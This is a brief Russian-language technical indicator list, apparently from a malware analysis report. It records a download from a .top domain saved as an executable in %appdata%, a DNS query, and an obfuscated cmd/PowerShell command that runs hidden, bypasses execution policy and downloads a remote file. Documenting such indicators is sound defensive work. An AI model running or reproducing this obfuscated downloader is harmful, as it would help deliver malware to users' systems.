Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^W^eRShE^Ll.eX^e -eXE^cU^t^i^ONpolI^Cy By^pAss -n^op^rOFIL^E^ -^wIn^d^OwsT^ylE^ h^i^dDEN^ (^Ne^W-Ob^jE^CT^ ^SY^st^eM^.n^e^T^.^wEB^CL^ieNT^).^DOw^nL^O^a^d^f^Ile(^'http://...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "po^W^eRShE^Ll.eX^e -eXE^cU^t^i^ONpolI^Cy By^pAss -n^op^rOFIL^E^ -^wIn^d^OwsT^ylE^ h^i^dDEN^ (^Ne^W-Ob^jE^CT^ ^SY^st^eM^.n^e^T^.^wEB^CL^ieNT^).^DOw^nL^O^a^d^f^Ile(^'http://...' (со скрытым окном)